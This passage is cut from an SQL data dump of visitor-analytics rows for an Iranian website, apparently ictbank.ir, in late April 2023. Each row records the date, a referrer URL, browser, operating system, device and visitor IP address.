(31806,'2023-04-22','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31807,'2023-04-22','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,1,0),
(31808,'2023-04-23','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.156','000',0,1,0),
(31809,'2023-04-23','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.15.14','000',0,6,0),
(31810,'2023-04-23','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31811,'2023-04-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','167.114.53.55','000',0,1,0),
(31812,'2023-04-23','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31813,'2023-04-23','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31814,'2023-04-23','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','158.255.215.200','000',0,1,0),
(31815,'2023-04-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','92.204.139.118','000',0,1,0),
(31816,'2023-04-23','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(31817,'2023-04-23','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,1,0),
(31818,'2023-04-23','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.45','000',0,3,0),
(31819,'2023-04-23','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','67.20.114.55','000',0,1,0),
(31820,'2023-04-23','https://ictbank.ir/blog','Firefox','OS X','112.0','desktop','Macintosh','','131.153.142.170','000',0,1,0),
(31821,'2023-04-23','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(31822,'2023-04-23','https://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.15','000',0,2,0),
(31823,'2023-04-23','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.189','000',0,2,0),
(31824,'2023-04-23','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','185.252.232.227','000',0,11,0),
(31825,'2023-04-23','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.199.216.61','000',0,1,0),
(31826,'2023-04-23','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','51.142.103.94','000',0,1,0),
(31827,'2023-04-23','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.222.19.44','000',0,1,0),
(31828,'2023-04-23','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.104','000',0,1,0),
(31829,'2023-04-23','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(31830,'2023-04-23','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.142.236.40','000',0,3,0),
(31831,'2023-04-23','https://neginghavami.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.89','000',0,2,0),
(31832,'2023-04-23','https://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','181.215.176.49','000',0,2,0),
(31833,'2023-04-23','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.217.107.90','000',0,2,0),
(31834,'2023-04-23','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(31835,'2023-04-23','https://ictbank.ir/blog','Chrome','OS X','83.0.0.0','desktop','Macintosh','','107.22.5.228','000',0,4,0),
(31836,'2023-04-23','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','176.109.188.249','000',0,2,0),
(31837,'2023-04-23','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(31838,'2023-04-23','https://ictbank.ir/blog','Safari','OS X','16.0','desktop','Macintosh','','216.218.163.109','000',0,1,0),
(31839,'2023-04-24','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31840,'2023-04-24','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(31841,'2023-04-24','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(31842,'2023-04-24','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(31843,'2023-04-24','https://ictbank.ir/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','54.87.3.195','000',0,1,0),
(31844,'2023-04-24','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.243.11.101','000',0,1,0),
(31845,'2023-04-24','https://design-arena.ir/blog','Chrome','Windows','37.0.0.0','desktop','Unknown','','179.61.219.16','000',0,2,0),
(31846,'2023-04-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(31847,'2023-04-24','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(31848,'2023-04-24','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','185.76.77.160','000',0,1,0),
(31849,'2023-04-24','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','80.251.219.111','000',0,1,0),
(31850,'2023-04-24','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.127.77.103','000',0,1,0),
(31851,'2023-04-24','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','209.38.252.248','000',0,1,0),
(31852,'2023-04-24','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(31853,'2023-04-24','https://ictbank.ir/blog','Opera','Windows','11.0','desktop','Unknown','','54.217.83.13','000',0,1,0),
(31854,'2023-04-24','https://neginghavami.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','159.69.243.185','000',0,7,0),
(31855,'2023-04-24','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.169.218','000',0,127,0),
(31856,'2023-04-24','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','212.227.47.205','000',0,1,0),
(31857,'2023-04-24','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.142.150','000',0,1,0),
(31858,'2023-04-24','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.199.181','000',0,1,0),
(31859,'2023-04-24','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','85.208.136.198','000',0,1,0),
(31860,'2023-04-24','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.26','000',0,2,0),
(31861,'2023-04-24','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','93.90.200.43','000',0,1,0),
(31862,'2023-04-24','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(31863,'2023-04-24','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(31864,'2023-04-24','https://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','176.9.114.107','000',0,1,0),
(31865,'2023-04-24','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.152.193','000',0,1,0),
(31866,'2023-04-24','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31867,'2023-04-24','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','130.255.166.26','000',0,1,0),
(31868,'2023-04-24','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','130.255.166.82','000',0,1,0),
(31869,'2023-04-24','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','130.255.166.69','000',0,1,0),
(31870,'2023-04-24','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','130.255.166.24','000',0,1,0),
(31871,'2023-04-24','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','150.95.112.79','000',0,1,0),
(31872,'2023-04-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(31873,'2023-04-24','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.50','000',0,1,0),
(31874,'2023-04-24','https://ictbank.ir/blog','Chrome','OS X','91.0.0.0','desktop','Macintosh','','3.17.163.228','000',0,2,0),
(31875,'2023-04-24','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,1,0),
(31876,'2023-04-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(31877,'2023-04-24','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31878,'2023-04-24','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','45.154.98.26','000',0,9,0),
(31879,'2023-04-24','https://ictbank.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','131.153.142.170','000',0,1,0),
(31880,'2023-04-24','https://ictbank.ir/blog','Firefox','OS X','95.0','desktop','Macintosh','','131.153.143.50','000',0,2,0),
(31881,'2023-04-24','https://ictbank.ir/blog','Firefox','OS X','95.0','desktop','Macintosh','','131.153.240.178','000',0,2,0),
(31882,'2023-04-24','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.239.251.180','000',0,1,0),
(31883,'2023-04-24','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','185.141.106.60','000',0,1,0),
(31884,'2023-04-25','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31885,'2023-04-25','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','54.74.185.134','000',0,30,0),
(31886,'2023-04-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.234','000',0,2,0),
(31887,'2023-04-25','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(31888,'2023-04-25','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31889,'2023-04-25','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','169.150.204.38','000',0,10,0),
(31890,'2023-04-25','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.34','000',0,1,0),
(31891,'2023-04-25','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.3','000',0,1,0),
(31892,'2023-04-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,5,0),
(31893,'2023-04-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(31894,'2023-04-25','https://ictbank.ir/blog','Chrome','iOS','87.0.0.0','mobile:smart','iPhone','','5.253.61.199','000',0,1,0),
(31895,'2023-04-25','https://ictbank.ir/blog','Yandex Browser','Android','20.0.0.0.0','tablet','Tab 4 8','','178.210.75.23','000',0,2,0),
(31896,'2023-04-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.252','000',0,2,0),
(31897,'2023-04-25','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','54.217.83.13','000',0,1,0),
(31898,'2023-04-25','https://ictbank.ir/blog','Chrome','OS X','95.0.0.0','desktop','Macintosh','','44.205.2.62','000',0,1,0),
(31899,'2023-04-25','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','118.193.38.58','000',0,1,0),
(31900,'2023-04-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.236.176','000',0,1,0),
(31901,'2023-04-25','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.189','000',0,2,0),
(31902,'2023-04-25','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','5.135.152.155','000',0,2,0),
(31903,'2023-04-25','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.24.32','000',0,1,0),
(31904,'2023-04-25','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.12.175','000',0,2,0),
(31905,'2023-04-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.250','000',0,2,0),
(31906,'2023-04-25','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','45.154.98.26','000',0,1,0),
(31907,'2023-04-25','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.147.96','000',0,13,0),
(31908,'2023-04-25','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.92','000',0,6,0),
(31909,'2023-04-25','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(31910,'2023-04-25','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.55.224.110','000',0,1,0),
(31911,'2023-04-25','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,1,0),
(31912,'2023-04-25','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','139.59.77.216','000',0,2,0),
(31913,'2023-04-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.77','000',0,1,0),
(31914,'2023-04-25','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.149.128','000',0,58,0),
(31915,'2023-04-25','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(31916,'2023-04-25','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','139.59.123.73','000',0,2,0),
(31917,'2023-04-25','https://design-arena.ir/blog','Edge','OS X','108.0.0.0','desktop','Macintosh','','65.21.6.144','000',0,7,0),
(31918,'2023-04-25','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.142.236.40','000',0,1,0),
(31919,'2023-04-25','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.167.12.16','000',0,20,0),
(31920,'2023-04-25','http://ictbank.ir','Safari','iOS','12.0','mobile:smart','iPhone','','185.220.100.255','000',0,1,0),
(31921,'2023-04-25','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','172.187.192.35','000',0,1,0),
(31922,'2023-04-25','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','77.243.61.193','000',0,1,0),
(31923,'2023-04-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','161.97.147.235','000',0,1,0),
(31924,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','170.64.164.246','000',0,1,0),
(31925,'2023-04-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.193.234','000',0,1,0),
(31926,'2023-04-26','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31927,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(31928,'2023-04-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','203.124.41.171','000',0,1,0),
(31929,'2023-04-26','https://ictbank.ir/blog','Chrome','Linux','112.0.0.0','desktop','Unknown','','44.227.127.2','000',0,1,0),
(31930,'2023-04-26','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','5.161.183.125','000',0,6,0),
(31931,'2023-04-26','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31932,'2023-04-26','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31933,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','75.0.0.0','desktop','Unknown','','134.249.61.142','000',0,1,0),
(31934,'2023-04-26','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','210.74.130.162','000',0,1,0),
(31935,'2023-04-26','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','178.159.37.41','000',0,4,0),
(31936,'2023-04-26','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,2,0),
(31937,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.212.90.245','000',0,1,0),
(31938,'2023-04-26','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','199.188.200.145','000',0,1,0),
(31939,'2023-04-26','https://ictbank.ir/blog','Edge','Windows','108.0.0.0','desktop','Unknown','','95.217.212.55','000',0,1,0),
(31940,'2023-04-26','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','5.39.104.183','000',0,2,0),
(31941,'2023-04-26','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(31942,'2023-04-26','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','212.92.58.16','000',0,1,0),
(31943,'2023-04-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.199.181','000',0,1,0),
(31944,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.136.208','000',0,1,0),
(31945,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','101.36.107.222','000',0,2,0),
(31946,'2023-04-26','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','80.94.92.60','000',0,3,0),
(31947,'2023-04-26','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','167.114.24.140','000',0,1,0),
(31948,'2023-04-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(31949,'2023-04-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','166.62.122.244','000',0,1,0),
(31950,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31951,'2023-04-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','92.205.18.40','000',0,1,0),
(31952,'2023-04-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(31953,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','89.185.85.140','000',0,3,0),
(31954,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','93.174.89.224','000',0,1,0),
(31955,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','185.243.218.27','000',0,1,0),
(31956,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','107.189.4.23','000',0,2,0),
(31957,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','128.31.0.13','000',0,1,0),
(31958,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','23.129.64.224','000',0,2,0),
(31959,'2023-04-26','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','23.129.64.226','000',0,2,0),
(31960,'2023-04-26','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.198.162.16','000',0,1,0),
(31961,'2023-04-26','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','174.138.64.200','000',0,1,0),
(31962,'2023-04-26','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,1,0),
(31963,'2023-04-26','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Nexus 5X','','74.125.210.80','000',0,1,0),
(31964,'2023-04-27','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(31965,'2023-04-27','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31966,'2023-04-27','https://ictbank.ir/blog','Firefox','Windows','60.0','desktop','Unknown','','37.46.133.220','000',0,1,0),
(31967,'2023-04-27','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','54.74.185.134','000',0,15,0),
(31968,'2023-04-27','https://ictbank.ir/blog','Chrome','Linux','89.0.0.0','desktop','Unknown','','144.91.106.14','000',0,6,0),
(31969,'2023-04-27','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','89.104.81.181','000',0,1,0),
(31970,'2023-04-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(31971,'2023-04-27','https://45.92.94.221:443/blog','Firefox','Windows','83.0','desktop','Unknown','','170.245.131.131','000',0,10,0),
(31972,'2023-04-27','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.142.236.36','000',0,3,0),
(31973,'2023-04-27','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.77','000',0,2,0),
(31974,'2023-04-27','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','146.59.111.136','000',0,3,0),
(31975,'2023-04-27','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.204.125.255','000',0,1,0),
(31976,'2023-04-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.33.154.71','000',0,1,0),
(31977,'2023-04-27','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,2,0),
(31978,'2023-04-27','https://ictbank.ir/blog','Chrome','Android','80.0.0.0','mobile:smart','Galaxy S20','','149.56.150.103','000',0,1,0),
(31979,'2023-04-27','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(31980,'2023-04-27','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(31981,'2023-04-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(31982,'2023-04-27','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','112.0.0.0','desktop','Unknown','','51.222.108.199','000',0,1,0),
(31983,'2023-04-27','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(31984,'2023-04-27','https://ictbank.ir/blog','Chrome','Windows','93.0.0.0','desktop','Unknown','','89.253.229.213','000',0,13,0),
(31985,'2023-04-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,1,0),
(31986,'2023-04-27','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.193.234','000',0,1,0),
(31987,'2023-04-27','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(31988,'2023-04-27','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','115.85.30.27','000',0,4,0),
(31989,'2023-04-27','https://ictbank.ir/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','176.9.114.107','000',0,1,0),
(31990,'2023-04-27','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,1,0),
(31991,'2023-04-27','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,2,0),
(31992,'2023-04-27','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.54.114.32','000',0,1,0),
(31993,'2023-04-27','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.57.227','000',0,1,0),
(31994,'2023-04-28','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(31995,'2023-04-28','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','188.85.81.233','000',0,1,0),
(31996,'2023-04-28','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(31997,'2023-04-28','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,2,0),
(31998,'2023-04-28','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31999,'2023-04-28','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','124.222.59.61','000',0,1,0),
(32000,'2023-04-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(32001,'2023-04-28','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(32002,'2023-04-28','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.121','000',0,5,0),
(32003,'2023-04-28','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','184.94.240.88','000',0,1,0),
(32004,'2023-04-28','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,5,0),
(32005,'2023-04-28','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','138.197.120.177','000',0,2,0),
(32006,'2023-04-28','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,1,0),
(32007,'2023-04-28','https://design-arena.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.89','000',0,2,0),
(32008,'2023-04-28','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.12.207.203','000',0,1,0),
(32009,'2023-04-28','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','178.254.29.124','000',0,1,0),
(32010,'2023-04-28','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,1,0),
(32011,'2023-04-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(32012,'2023-04-28','https://ictbank.ir/blog','Arora','Linux','0.0','desktop','Unknown','','49.37.115.215','000',0,1,0),
(32013,'2023-04-28','https://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.142','000',0,2,0),
(32014,'2023-04-28','https://ictbank.ir/blog','Chrome','OS X','91.0.0.0','desktop','Macintosh','','18.188.31.130','000',0,2,0),
(32015,'2023-04-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(32016,'2023-04-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,1,0),
(32017,'2023-04-28','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(32018,'2023-04-28','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.231','000',0,1,0),
(32019,'2023-04-28','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.228','000',0,1,0),
(32020,'2023-04-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(32021,'2023-04-28','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.231.188','000',0,2,0),
(32022,'2023-04-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','204.12.219.140','000',0,1,0),
(32023,'2023-04-28','https://search.brave.com/','Chrome','OS X','112.0.0.0','desktop','Macintosh','','91.65.169.37','000',0,5,0),
(32024,'2023-04-28','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','212.71.247.52','000',0,1,0),
(32025,'2023-04-28','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(32026,'2023-04-28','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','159.89.129.215','000',0,2,0),
